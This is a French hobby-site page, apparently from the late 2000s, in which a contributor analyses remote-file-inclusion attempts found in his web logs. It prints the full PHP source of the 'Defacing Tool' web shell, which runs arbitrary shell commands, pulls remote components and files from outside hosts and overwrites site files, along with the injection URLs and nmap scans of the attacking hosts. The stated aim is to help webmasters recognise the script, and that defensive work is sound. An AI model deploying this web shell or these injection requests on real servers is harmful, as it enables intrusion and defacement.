Site d'informatique facile
Objectif officiel : (ré)apprendre un mot d'informatique et (re)lire des fables.Objectif officieux : se cultiver avec des mots à replacer dans une conversation... ou pas.
Site d'information sur les dernières nouveautés en informatique, des conseils utiles, et l'actualité.
Sont disponibles les couleurs du web, les caractères iso, les équivalences des octets, la conversion des mm en pixels...
Vous trouverez des astuces quant aux opérateurs de requêtes Google, de quoi organiser le référencement de son site, du CSS , du HTML et des outils linux...)
Enjoy !
Informatique dernières pages vues
Devant l'effarante baisse de frequentation de mes chers visiteurs due aux désideratas de free dans la gestion des pages perso, tout ce site va dégager ailleurs sur un hébergement de qualité. Qu'ils gardent leurs mini sites en html de base, moi je déménage !Yen a marre !!! On se plie en 4 à référencer le site à créer du contenu pour voir ça ! 500 visiteurs jour ! baisse de 50% en 6 mois
Actualité informatique et technique du moment
Cette rubrique est amenée à disparaître puisque free a décidé de ne pas acccepter de sites supérieurs à 500 pages !Retrouvez dès à présent la nouvelle rubrique d'actualité
hébergée ailleurs pour votre confort...
et le mien hé hé ;-)
- itoos t68hd un baladeur multimédia 8 go abordable
itoos, un constructeur basé en Chine, propose un baladeur
multimédia baptisé T68HD. [...] - adam un robot scientifique qui se débrouille tout seul
Des chercheurs ont conçu un robot scientifique autonome. Il
a déjà trouvé quelque chose. [...] - votre véhicule accepte t il le carburant sp95 e10
Pouvez-vous utiliser le carburant SP95-E10 avec votre
véhicule ? La réponse vous est donnée sur un site officiel
mis en place par le gouvernement. [...] - stantum du vrai multitouch dans les mobiles
Les écrans tactiles sont désormais attendus dans nombre de
gadgets mobiles. Mais il y a tactile et tactile. La société
Stantum a développé une [...] - domaine eu trois ans et trois millions d'enregistrements
C'est aujourd'hui le troisième anniversaire du domaine .eu
et la Commission européenne le célèbre en soulignant qu'il
est concerné à ce jour par plus [...] - vlc media player une version 0 9 9 avant le jour j
Publication d'une nouvelle version de maintenance pour le
lecteur multimédia libre et multi-plateforme VLC media
player. Une version étiquetée 0.9.9, [...] - alimentations ocz décroche l'or
OCZ nous propose de nouvelles alimentations : la série Z. [...]
- les dictionnaires le robert accessibles depuis internet
Les dictionnaires Le Petit Robert, Le Grand Robert et Le
Grand Robert et Collins sont maintenant accessibles en ligne
moyennant un abonnement payant. [...] - gnome veut un changement visible dans l'interface user
Populaire sur les distributions GNU/Linux, l'environnement
de bureau GNOME prévoit un gros changement au niveau de son
interface utilisateur en 2010, [...] - internet explorer 8 solution pour la lenteur des onglets
Plusieurs utilisateurs d'Internet Explorer 8 ont constaté
certaines lenteurs lors de l'ouverture d'un nouvel onglet.
Le logiciel Spybot - Search & [...]
Les nouveautés
Lutter efficacement contre les chaines de mail dans Blagagogo.
Formater une clé usb ou un disque externe dans Linux.
Le SP3 de Windows XP intègre Flash Player non sécurisé dans Sécurité.
le gouvernement veut un filtrage de masse des réseaux dans Actualités.
installer des polices depuis KDE dans Linux.
marre des chaines de mail dans Expression libre .
Phishing chez orange dans Sécurité.
microsoft msw mega jackpot lotto dans Sécurité.
PHP 5 et dreamweaver dans Citations.
Le président NIco dans Blagagogo.
Formater une clé usb ou un disque externe dans Linux.
Le SP3 de Windows XP intègre Flash Player non sécurisé dans Sécurité.
le gouvernement veut un filtrage de masse des réseaux dans Actualités.
installer des polices depuis KDE dans Linux.
marre des chaines de mail dans Expression libre .
Phishing chez orange dans Sécurité.
microsoft msw mega jackpot lotto dans Sécurité.
PHP 5 et dreamweaver dans Citations.
Le président NIco dans Blagagogo.
"/index.php?action=http://207.226.250.183/tool25.gif
Ce qui suit concerne des tentatives de "défaçage" de site.Surveillez vos logs ;)
Merci à zeb pour ces précisions :
Comme pour rire et donner un exemple tangible de cette methode de Hacking vieille comme mes artères, voici ce que je découvre dans mes logs ce matin :
( tous compte fait, je suis peut être un grand malade car je lis mes log tous les jours, et même plusieurs fois par jour parfois )
26964 0 /index.php?sec=http://207.226.250.183/tool25.gif? 207.36.196.99 2006 December 01 08:03:29
26963 0 /index.php?page=http://207.226.250.183/tool25.gif? 83.194.155.63 2006 December 01 07:56:15
26962 0 / 83.194.155.63 2006 December 01 07:48:03
26961 0 /index.php?section=http://207.226.250.183/tool25.gif? 207.36.196.99 2006 December 01 07:16:40
26960 0 /recherches.php 195.33.116.129 2006 December 01 07:13:50
26959 0 /index.php?pg=http://207.226.250.183/tool25.gif? 207.36.196.99 2006 December 01 06:40:12
26958 0 /index.php?page=http://207.226.250.183/tool25.gif? 207.36.196.99 2006 December 01 06:09:09
c'est pas tout, sur un autre site je voie :
46993 0 /index.php?sec=http://207.226.250.183/tool25.gif? 207.36.196.99 2006 December 01 08:04:15
46992 0 /Code-vestimentaire-masculin-a-la-belle-epoque-1900.php 193.48.219.9 2006 December 01 07:55:05
46991 0 /costumes-1900.php 193.48.219.9 2006 December 01 07:53:46
46990 0 /forum/Actualite/Ile-de-Re-pompage-de-fioul-en-bonne-voie.php 193.253.238.44 2006 December 01 07:52:41
46989 0 / 83.194.155.63 2006 December 01 07:48:12
46988 0 / 83.194.155.63 2006 December 01 07:48:06
46987 0 /chateau-de-luneville.php 66.249.66.97 2006 December 01 07:39:16
46986 0 /index.php?section=http://207.226.250.183/tool25.gif? 207.36.196.99 2006 December 01 07:17:17
46985 0 /forum/ 66.249.66.97 2006 December 01 07:16:28
46984 0 /index.php?pg=http://207.226.250.183/tool25.gif? 207.36.196.99 2006 December 01 06:40:42
et encore sur un autre ...
12114 /index.php?section=http://207.226.250.183/tool25.gif? 207.36.196.99 07:23:33
12113 /forum/profile.php?mode=register&sid=43695c2f2010f29fb136b06832baa623 66.249.72.234 07:20:51
12112 /fables/fables.php 86.75.159.191 07:14:44
12111 /index.php?pg=http://207.226.250.183/tool25.gif? 207.36.196.99 06:45:37
12110 /index.php?page=http://207.226.250.183/tool25.gif? 207.36.196.99 06:14:22
plusieurs elements me tapent directement la retine a grand coup d'aiguilles.
- je n'ai pas sur ces site de page d'index qui passe des parametres en Get ( http://monsite.com/index.php?page=....
- tool25.gif sent le gif a la con. qui irait nomer un gif 'tool'
- les IP source de l'appel de page ( 207.36.196.99 ) et en parametre ( 207.226.250.183 ) ne font pas parties de mes visiteurs habituels.
Reverse DNS for 207.226.250.183
Generated by www.DNSstuff.com
Location: United States [City: ">
Answer:
207.226.250.183 PTR record: customer.bitshop.com. [TTL 8640s"> [A=None"> *ERROR* There is no A record for customer.bitshop.com. (may be negatively cached).
Reverse DNS for 207.36.196.99
Generated by www.DNSstuff.com
Location: United States [City: Lake Worth, Florida">
Answer:
207.36.196.99 PTR record: dedicated.trudgers.org. [TTL 3600s"> [A=207.36.196.99">
je vais donc voir ce qui se cache derrière le gif en question ici : http://207.226.250.183/tool25.gif
miracle le browser me répond : L'image “http://207.226.250.183/tool25.gif” ne peut être affichée car elle contient des erreurs.
sans blague !!!
ne nous arretons pas en si bon chemin et alons voir derrière le gif pour savoir ce qu'il cache comme erreur et la miracle j'ai enfin l'explication de la dite erreur.
<!--
Defacing Tool 1.8 by r3v3ng4ns
revengans@hotmail.com
codigo reescrito
-->
<?php
@closelog();
@error_reporting(0);
$vers="1.8 priv8";
$remote_addr="http://rphp.v10.com.br/";
$format_addr=".gif";
$cmd_addr=$remote_addr."cmd".$format_addr;
$safe_addr=$remote_addr."safe17".$format_addr;
$writer_addr=$remote_addr."writer17".$format_addr;
$phpget_addr=$remote_addr."get17".$format_addr;
$feditor_addr=$remote_addr."filed".$format_addr;
$put_addr=$remote_addr."filed_put".$format_addr;
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
if(empty($chdir)) $chdir = $_REQUEST['chdir'];
if(empty($cmd)) $cmd = $_REQUEST['cmd'];
if(empty($fu)) $fu = $_REQUEST['fu'];
if(empty($list)) $list = $_REQUEST['list'];
if(empty($qualMet)) $qualMet = $_REQUEST['qualMet'];
if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 = explode(";",$boom['1'], 2);
$toDir = $boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir ..')!==false){
$cadaDir = array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
$toDir = str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
} else if(strpos($cmd, 'chdir .')!==false) $toDir = getcwd();
if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'.
Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' instead.\n";
$cmdShow = $cmd;
//To keep the changes in the url, when using the 'GET' way to send php variables
if(empty($post)){
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
}
//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6;
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
//Turns the 'ls' command more usefull, showing it as it looks in the shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
else if($cmd=='ls') $cmd = "ls -F";
//If there are some '//' in the cmd, its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="cmdField.focus();cmdField.select();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+cmdField.value;return false;}
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+cmdField.value;return false;}
function PHPget(){inclVar();var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://www.colegioparthenon.com.br/dirativo/bd/nc.gif");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://www.geocities.com/revensite/index.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'&'<?=$showdir;?>;}else{ return false }}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+cmdField.value;return false;}
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
</script>
<table width="690" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ]<br>
<font size=2>by r3v3ng4ns - revengans@hotmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="cForm" id="cForm" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="cmdField" type="text" id="cmdField" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
</td></tr></table><table><tr><td>
<?php
if(isset($chdir)) @chdir($chdir);
ob_start();
function safemode($what){echo "It seems that this server is using php in safemode. Try to use DTool in Safemode.";}
function popenn($what){$handle=popen("$what", "r");$out=@fread($handle, 2096);echo $out;@pclose($handle);}
function execc($what){exec("$what",$array_out);$out=implode("\n",$array_out);echo $out;}
function shell($what){echo(shell_exec($what));}
$funE="function_exists";
if($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
else {$fe="safemode";$feshow=$fe;}
if($fu!="" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
}
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") @include($remote_addr."flist".$format_addr);
?>
</table>
demandons des precisions a Google :
"Defacing Tool 2.0 by r3v3ng4ns" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface ...
conclusion :
A la vue des heures des tentatives, je pense que la procedure mis en oeuvre est de type automatique avec un parametrage lent pour ne pas eveiller les soupçons (domage qu'il soit tombé sur un site a faible visibilité)
Il sagit bel et bien d'une tentative d'exploitation de faille include pour defacer le site.
Je pretend que c'est automatique car ces attaques ont lieux sur plusieurs sites liés et le parametre d'injection de script passé en GET dans l'URL change a chaque tentative ce qui montre que ce n'est pas un humain qui observe un site mais un bot qui tente tout ce qui de plus courant au hasard.
Je ne pense pas que l'attaquant soit monsieur 207.36.196.99. En effet voici la signature de sa machine:
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2006-12-01 08:00 CET
Interesting ports on dedicated.trudgers.org (207.36.196.99):
(The 1643 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp filtered msrpc
143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
5000/tcp filtered UPnP
6666/tcp filtered irc-serv
6667/tcp filtered irc
6668/tcp filtered irc
7000/tcp filtered afs3-fileserver
7001/tcp filtered afs3-callback
8000/tcp open http-alt
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=3.81%P=i586-mandrake-linux-gnu%D=12/1%Tm=456FD3F3%O=21%C=1)
TSeq(Class=RI%gcd=1%SI=401C69%IPID=Z%TS=100HZ)
TSeq(Class=RI%gcd=1%SI=4018D8%IPID=Z%TS=100HZ)
TSeq(Class=RI%gcd=1%SI=40232E%IPID=Z%TS=100HZ)
T1(Resp=N)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=Y%DF=N%TOS=0%IPLEN=164%RIPTL=148%RID=E%RIPCK=F%UCK=F%ULEN=134%DAT=E)
Uptime 48.379 days (since Fri Oct 13 23:57:59 2006)
Nmap finished: 1 IP address (1 host up) scanned in 256.821 seconds
elle ressemble trop a un serveur d'hebergement et cette signature est fort similaire a celle de la machine hebergant le gif a quelques différence significatives il semble qu'il sagisse d'un routeur et regardez en bas la liste des port ouverts sur une backdoor.
Citation:
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2006-12-01 08:06 CET
Interesting ports on customer.bitshop.com (207.226.250.183):
(The 1628 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
27/tcp filtered nsw-fe
42/tcp filtered nameserver
80/tcp open http
88/tcp filtered kerberos-sec
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
389/tcp filtered ldap
443/tcp open https
445/tcp filtered microsoft-ds
464/tcp filtered kpasswd5
593/tcp filtered http-rpc-epmap
636/tcp filtered ldapssl
1026/tcp filtered LSA-or-nterm
1031/tcp filtered iad2
1040/tcp filtered netsaint
1080/tcp filtered socks
1503/tcp filtered imtc-mcs
1993/tcp filtered snmp-tcp-port
2001/tcp filtered dc
2012/tcp filtered ttyinfo
2023/tcp filtered xinuexpansion3
2401/tcp filtered cvspserver
3128/tcp filtered squid-http
3372/tcp filtered msdtc
3389/tcp filtered ms-term-serv
4000/tcp open remoteanything
4008/tcp open netcheque
4343/tcp filtered unicall
10000/tcp filtered snet-sensor-mgmt
12345/tcp filtered NetBus
17300/tcp filtered kuang2
27374/tcp filtered subseven
31337/tcp filtered Elite
Device type: broadband router|general purpose|firewall
Running: Cayman embedded, Elsa embedded, FreeBSD 4.X, IBM AIX 3.X|4.X, Linux 1.X, Microsoft Windows 2003/.NET|NT/2K/XP, Symantec Windows NT/2K/XP, Zyxel ZyNOS
Too many fingerprints match this host to give specific OS details
Nmap finished: 1 IP address (1 host up) scanned in 46.248 seconds
je penche donc pour une attaque menée depuis un zombi qui utiliserait les service d'un serveur capturé précédement.
Il y aurais surement beaucoup de choses a dire en plus l'analyse est succinte mais j'ai autre chose a foutre a cette heure que de phylosopher sur les click&hack-boys
retournons a la lecture sereine de mes log Wink
PS je met delibérement le code de la backdoor sur le message pour donner les moyens aux webmestres codeurs d'approfondir leurs reponse en cas de tentative d'intrusion par ce script.
morale
esope
grenier
moral
taupe
lion
loup
informatique
eric
pps
vert
nvidia
roland
la morale
turquoise
nmap
visibility
renard
windows
chauve-souris
orange
couleur
linux
jean
firefox
chauve souris
serpent
agneau
argent
florence
laurent
vista
sophie
diaporama
florimage
ecran tactile
moro
lapin
lion et gazelle
anti pub
rené
grenouille
rouge
porno
microsoft
le loup
asus
grenouilles
pauline
fable d'esope
le héron
image
julie
bleu
music
rotation
loup renard
souvenirs
#fcd21c
caroline
vert amande
les deux amis
alexandra
delphine
bleu pétrole
jeanne
ps
commentaire
le lion et
marc
amelie
fernand
gays
camille
#c8ad7f
carina
loup lion
sur esope
gris
françois
dragon
chevreau
rats
html
pirate
test
véronique
herison
deux amis
grege
© latarteauchips 2010 . .
Les amis des loisirs : Sorties paris|Chalet Vosges |
